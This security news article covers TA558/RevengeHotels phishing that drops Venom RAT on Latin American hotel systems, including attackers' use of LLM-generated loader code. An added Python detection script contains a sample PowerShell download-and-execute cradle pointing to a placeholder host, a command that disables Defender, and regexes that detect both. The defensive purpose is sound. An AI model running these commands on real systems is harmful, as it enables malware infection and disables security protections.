The threat actor TA558 has been attributed to a new wave of attacks delivering remote access trojans, including Venom RAT, to hotels in Brazil and Spanish-speaking markets, researchers say. The activity is tracked by Kaspersky as part of a cluster named RevengeHotels, which has a history of targeting hospitality and travel organizations in Latin America.
Kaspersky noted that the latest campaigns, observed in the summer of 2025, rely on phishing emails with invoice-themed content to drop Venom RAT implants via JavaScript loaders and PowerShell downloaders. A significant portion of the initial infector and downloader code appears to be generated by large language model (LLM) agents, the security firm said.
The Venom RAT chain starts with a heavily commented script that the firm says resembles LLM output; its primary function is to load the subsequent scripts that carry out the infection. A PowerShell payload retrieves a downloader named cargajecerrr.txt from an external server and executes it, after which two additional payloads are fetched: a loader responsible for launching Venom RAT and the RAT itself. Venom RAT is a commercial tool reportedly priced at about $650 for a lifetime license, with bundled options that include HVNC and Stealer components.
Security researchers describe Venom RAT as capable of data exfiltration, acting as a reverse proxy, and incorporating anti-kill protections to ensure persistence. Among its techniques, the malware modifies the Discretionary Access Control List (DACL) of its own running process, terminates security-related processes, and establishes persistence via Windows Registry modifications. When run with elevated privileges, it can also enable SeDebugPrivilege, mark itself as a critical system process, keep the display awake, and prevent sleep. The report also notes propagation through removable USB drives, attempts to disable Defender Antivirus, and tampering with the Task Scheduler and Registry to maintain access.
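The infection chain and the persistence behaviours described in the two paragraphs above map onto a handful of host telemetry signals a defender can look for: a script host (the JavaScript loader) spawning PowerShell, a PowerShell download-and-execute cradle fetching a remote .txt payload, a Run-key write for persistence, and a Defender tampering command. The following Python is an added example, not code from the article or from Kaspersky; it runs a small rule set over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set). The event records, the SID, the placeholder URL and the file names are all constructed for this example and are not indicators from the campaign.

```python
"""Added example: rule-based triage of constructed Sysmon-style events for the
behaviours the article attributes to the RevengeHotels Venom RAT chain.
Field names follow Sysmon's schema (EventID, Image, ParentImage, CommandLine,
TargetObject); every sample value below is constructed, not a real IoC."""
import re

# Script hosts that a JavaScript loader would run under.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# PowerShell download primitives, an in-memory execution primitive, and a
# remote .txt resource (the article's downloader stage is fetched as a .txt).
DOWNLOAD_CRADLE_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)",
    re.IGNORECASE)
EXEC_RE = re.compile(r"(Invoke-Expression|\biex\b)", re.IGNORECASE)
REMOTE_TXT_RE = re.compile(r"https?://\S+\.txt", re.IGNORECASE)

# Registry autostart locations (Sysmon EventID 13 TargetObject).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)

# Attempts to switch off Defender real-time protection from PowerShell.
DEFENDER_TAMPER_RE = re.compile(
    r"Set-MpPreference\s+-Disable|DisableRealtimeMonitoring", re.IGNORECASE)


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(ev: dict) -> list:
    """Return the names of every rule the event matches, in a fixed order."""
    hits = []
    if ev.get("EventID") == 1:  # process creation
        img = image_name(ev.get("Image", ""))
        parent = image_name(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if img == "powershell.exe" and parent in SCRIPT_HOSTS:
            hits.append("script_host_spawned_powershell")
        if DOWNLOAD_CRADLE_RE.search(cmd) and EXEC_RE.search(cmd):
            hits.append("download_and_execute_cradle")
        if DOWNLOAD_CRADLE_RE.search(cmd) and REMOTE_TXT_RE.search(cmd):
            hits.append("remote_txt_payload_fetch")
        if DEFENDER_TAMPER_RE.search(cmd):
            hits.append("defender_tampering")
    elif ev.get("EventID") == 13:  # registry value set
        if RUN_KEY_RE.search(ev.get("TargetObject", "")):
            hits.append("run_key_persistence")
    return hits


def scan_events(events: list) -> dict:
    """Classify a batch of events; return flagged indices and per-rule counts."""
    flagged, counts = [], {}
    for idx, ev in enumerate(events):
        hits = classify_event(ev)
        if hits:
            flagged.append(idx)
        for rule in hits:
            counts[rule] = counts.get(rule, 0) + 1
    return {"flagged": flagged, "rule_counts": counts}


# Constructed sample telemetry: one loader-to-PowerShell cradle, one Run-key
# write, one benign PowerShell run, one Defender tampering attempt.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS_EXE,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": ("powershell.exe -nop -w hidden -c \"IEX (New-Object "
                     "Net.WebClient).DownloadString("
                     "'http://placeholder.invalid/stage2.txt')\"")},
    {"EventID": 13, "Image": r"C:\Users\guest\AppData\Roaming\svc.exe",
     "TargetObject": (r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                      r"\Software\Microsoft\Windows\CurrentVersion\Run\svc")},
    {"EventID": 1, "Image": PS_EXE,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Date"},
    {"EventID": 1, "Image": PS_EXE,
     "ParentImage": r"C:\Users\guest\AppData\Roaming\svc.exe",
     "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
]

if __name__ == "__main__":
    for idx, ev in enumerate(SAMPLE_EVENTS):
        print(idx, classify_event(ev))
    print(scan_events(SAMPLE_EVENTS))
```

Each rule on its own is noisy in a real environment (administrators do run Invoke-WebRequest), so the value lies in correlating them on one host within a short window: a script-host-spawned PowerShell cradle followed by a Run-key write from a newly dropped binary is the sequence the article describes, and that combination is what an alert should key on.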
Kaspersky notes that RevengeHotels has broadened its capabilities, leveraging LLM agents to generate and adjust phishing lures and expand its reach into new regions. The attackers’ objective remains the same: to harvest guest credit card data from hotel systems and online travel agencies (OTAs) such as Booking.com, according to the Unit 42 analysis cited by researchers.
In its assessment, Kaspersky also pointed to a pattern of Portuguese- and Spanish-language lures tied to hotel reservations and job applications, crafted to increase the likelihood that recipients will click on malicious links and trigger the infection chain. The security firm emphasizes that RevengeHotels’ use of AI-generated components marks a notable shift toward more scalable, adaptable phishing campaigns against the hospitality sector.